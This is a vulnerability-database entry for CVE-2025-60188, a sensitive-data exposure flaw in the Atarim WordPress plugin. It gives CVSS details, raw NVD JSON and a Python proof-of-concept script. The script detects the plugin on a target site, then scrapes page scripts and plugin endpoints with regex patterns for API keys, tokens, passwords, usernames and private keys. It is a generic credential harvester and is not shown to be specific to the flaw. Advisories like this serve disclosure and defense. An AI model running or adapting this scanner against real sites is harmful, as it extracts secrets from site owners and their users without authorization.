Security Vulnerability Report
中文
CVE-2025-60188 CVSS 7.5 HIGH

CVE-2025-60188

Published: 2025-11-06 16:16:04
Last Modified: 2026-04-27 18:16:24

Description

Insertion of Sensitive Information Into Sent Data vulnerability in Vito Peleg Atarim atarim-visual-collaboration allows Retrieve Embedded Sensitive Data.This issue affects Atarim: from n/a through <= 4.2.1.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Atarim Visual Collaboration <= 4.2.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-60188 PoC - Atarim Plugin Sensitive Data Exposure # This PoC demonstrates how to extract sensitive data from Atarim plugin import requests from bs4 import BeautifulSoup import re import json def check_atarim_vulnerability(target_url): """ Check if target WordPress site uses vulnerable Atarim plugin and extract potentially sensitive data from the response """ print(f"[*] Scanning target: {target_url}") # Step 1: Fetch the main page try: response = requests.get(target_url, timeout=30) html_content = response.text except requests.RequestException as e: print(f"[-] Failed to fetch page: {e}") return None # Step 2: Check if Atarim plugin is present atarim_indicators = [ 'atarim', 'atrim-editor', 'wpAtarim', 'atarim-visual-collaboration' ] found_indicators = [] for indicator in atarim_indicators: if indicator.lower() in html_content.lower(): found_indicators.append(indicator) if not found_indicators: print("[-] Atarim plugin not detected on this page") return None print(f"[+] Atarim plugin detected: {found_indicators}") # Step 3: Extract embedded JavaScript data sensitive_patterns = { 'api_keys': r'["\']?(api[_-]?key|apikey|api_secret)["\']?\s*[:=]\s*["\']([a-zA-Z0-9_-]{20,})["\']', 'tokens': r'["\']?(token|auth_token|access_token|bearer)["\']?\s*[:=]\s*["\']([a-zA-Z0-9_-]{20,})["\']', 'passwords': r'["\']?(password|passwd|pwd)["\']?\s*[:=]\s*["\']([^"\']{6,})["\']', 'credentials': r'["\']?(username|user|login)["\']?\s*[:=]\s*["\']([^"\']{3,})["\']', 'private_keys': r'-----BEGIN (RSA|DSA|EC|OPENSSH) PRIVATE KEY-----' } extracted_data = {} soup = BeautifulSoup(html_content, 'html.parser') # Extract inline scripts scripts = soup.find_all('script') for script in scripts: script_content = script.string or '' for data_type, pattern in sensitive_patterns.items(): matches = re.findall(pattern, script_content, re.IGNORECASE) if matches: if data_type not in extracted_data: extracted_data[data_type] = [] extracted_data[data_type].extend(matches) # Step 4: Check for exposed configuration endpoints common_endpoints = [ '/wp-json/atarim/', '/wp-content/plugins/atarim/', '/wp-admin/admin-ajax.php' ] print("\n[*] Checking for exposed endpoints...") for endpoint in common_endpoints: url = target_url.rstrip('/') + endpoint try: resp = requests.get(url, timeout=10) if resp.status_code == 200: print(f"[+] Endpoint accessible: {url}") # Check for sensitive data in response for data_type, pattern in sensitive_patterns.items(): if re.search(pattern, resp.text, re.IGNORECASE): print(f" [!] Potential {data_type} found in response") except: pass # Step 5: Report findings print("\n" + "="*50) print("SCAN RESULTS") print("="*50) if extracted_data: print("[!] Sensitive data patterns detected:") for data_type, values in extracted_data.items(): print(f" - {data_type}: {len(values)} occurrence(s)") return extracted_data else: print("[*] No obvious sensitive data patterns found in initial scan") print("[*] Manual inspection recommended via browser dev tools") return {} # Example usage if __name__ == "__main__": import sys if len(sys.argv) > 1: target = sys.argv[1] else: target = input("Enter target URL: ") check_atarim_vulnerability(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-60188", "sourceIdentifier": "[email protected]", "published": "2025-11-06T16:16:03.560", "lastModified": "2026-04-27T18:16:24.160", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Insertion of Sensitive Information Into Sent Data vulnerability in Vito Peleg Atarim atarim-visual-collaboration allows Retrieve Embedded Sensitive Data.This issue affects Atarim: from n/a through <= 4.2.1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-201"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/atarim-visual-collaboration/vulnerability/wordpress-atarim-plugin-4-2-sensitive-data-exposure-vulnerability-2?_s_id=cve", "source": "[email protected]"}]}}